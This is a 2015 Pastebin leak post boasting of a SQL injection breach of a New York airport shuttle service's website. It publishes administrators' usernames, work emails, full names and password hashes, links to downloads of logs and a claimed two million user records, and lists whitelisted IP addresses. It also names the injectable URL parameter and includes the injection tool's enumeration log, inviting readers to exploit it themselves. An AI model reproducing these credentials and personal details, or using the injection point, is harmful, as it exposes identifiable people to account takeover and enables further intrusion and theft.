SHARE
TWEET

New York Airport Service FULL LEAK + Tutorial

Network Apr 17th, 2015 (edited) 798 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  _   _ _____ _                      _         ____
  2.  | \ | |___ /| |___      _____  _ __| | __    / / /
  3.  |  \| | |_ \| __\ \ /\ / / _ \| '__| |/ /   / / /  
  4.  | |\  |___) | |_ \ V  V / (_) | |  |   <   / / /  
  5.  |_|_\_|____/ \__|_\_/\_/ \___/|_|  |_|\_\ /_/_/    
  6.    / __ \ _ __ |___ /| |___      _____  _ __| | __  
  7.   / / _` | '_ \  |_ \| __\ \ /\ / / _ \| '__| |/ /  
  8.  | | (_| | | | |___) | |_ \ V  V / (_) | |  |   <  
  9.   \ \__,_|_| |_|____/ \__| \_/\_/ \___/|_|  |_|\_\  
  10.    \____/                                          
  11.  
  12.     _/_//_/  ____/ /___ _/ /_____ _/ /_  ____ _________      
  13.    _/_//_/   / __  / __ `/ __/ __ `/ __ \/ __ `/ ___/ _ \    
  14.  _/_//_/    / /_/ / /_/ / /_/ /_/ / /_/ / /_/ (__  )  __/    
  15. /_//_/ __   \__,_/\__,_/\__/\__,_/_.___/___,_/____/\___/      
  16.   ____/ /_  ______ ___  ____       _/_//_/                    
  17.  / __  / / / / __ `__ \/ __ \    _/_//_/                      
  18. / /_/ / /_/ / / / / / / /_/ /  _/_//_/                        
  19. \__,_/\__,_/_/ /_/ /_/ .___/  /_//_/                          
  20.                     /_/  
  21.  
  22. *~*TABLES INJECTED*~*
  23. ------------
  24. admins         
  25. logs   
  26. orders 
  27. users  
  28. white_ips
  29.  
  30. *~* ADMIN ACCOUNTS LEAKED*~*
  31. User | Email | Name | Last Name | Password (MD5 or SHA1)
  32. vovik   mv.design@gmail.com     Vladimir        Miroshnichenko  395c4addd17bf2dcbfa1273025f7959d
  33. oneida  OChristophorou@graylinenewyork.com      Oneida  Christophorou   4b97d295fa191c9ec35abe8751d9daaa
  34. idembitzer      efi@twinamerica.com     Israel  Dembitzer       442cb29aff0ad7f83b4d82a8944b2f7a
  35. knunes  knunes@citysightsny.com Kyle    Nunes   b91380555647e3ec4b74c83a78766d1c
  36. agruen  agruen@twinamerica.com  Allan   Gruen   06b2c301d5346f73e26d48009bb0758d
  37. dgomez  dgomez@citysightsny.com Doug    Gomez   82df6a3f97b1df32e864e2a4f4c557f0
  38. jeidar  Jfonseca@airlinknyc.com Jeidar  Fonseca 804818bc39e68a541afcd534058bff7b
  39. viren   Vthakur@airlinknyc.com  Viren   Thakur  67121706c6dda153c21f0aaebde79b94
  40. jnogel  jnogel@twinamerica.com  Jesse   Nogel   6b72320d17cbbfd4c05cdc5dfcaf9831
  41. byudasin        byudasin@twinamerica.com        Boris   Yudasin 26f2111c24f3207c5687de0adb6615bb
  42. rramirez        rramirez@airlinknyc.com Rafael  Ramirez 325a2cc052914ceeb8c19016c091d2ac
  43. cpetrino        Christina.Petrino@twinamerica.com       Christina       Petrino 325a2cc052914ceeb8c19016c091d2ac
  44.  
  45. *~* LOGS LEAKED *~*
  46. User Name | IP Address | Log Text
  47. Link (Filename: nylogs.txt): https://www.sendspace.com/file/05c5zo
  48.  
  49. *~* USERS INFO LEAKED *~*
  50. Seriously, there's like over 2 million accounts, nobody got time for that. Inject it yourself if you want them so badly.
  51. First Name | Last Name | Email | Address | Phone Number
  52. Link (Filename: nyusers.txt): https://www.sendspace.com/file/kalynl
  53.  
  54. *White Listed IPs*
  55. IPs:
  56. 99.190.129.15
  57. 38.108.235.226
  58. 63.117.217.226
  59. 82.207.87.196
  60.  
  61. *~* MISCELLANEOUS *~*
  62. (Admins) Password Decryptions (Outdated): http://prntscr.com/5gl7mf
  63. SQLi Injection: http://www.nyairportservice.com/page.php?id=103 (any extension of .php?id=)
  64.  
  65. INJECTION LOG:
  66. Analyzing http://www.nyairportservice.com/page.php?id=103 with 1 input parameter(s)
  67. Test parameter: id
  68. Host IP: 23.253.29.208
  69. Web Server: Apache
  70. Powered-by: PHP/5.3.3
  71. Finding Keyword...
  72. Http Error: 302 Found
  73. Keyword Found: Over
  74. Injection type is String (')
  75. Keyword corrected: When
  76. DB Server: MySQL >=5
  77. Selected Column Count is 10
  78. Valid String Column is 3
  79. Current DB: nyas_new
  80.  
  81. *TABLE REQUEST*
  82. Count(table_name) of information_schema.tables where table_schema=0x6E7961735F6E6577 is 69
  83. Can not get all tables by group_concat!
  84. Count(table_name) of information_schema.tables where table_schema=0x6E7961735F6E6577
  85.  
  86. have fun :))
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top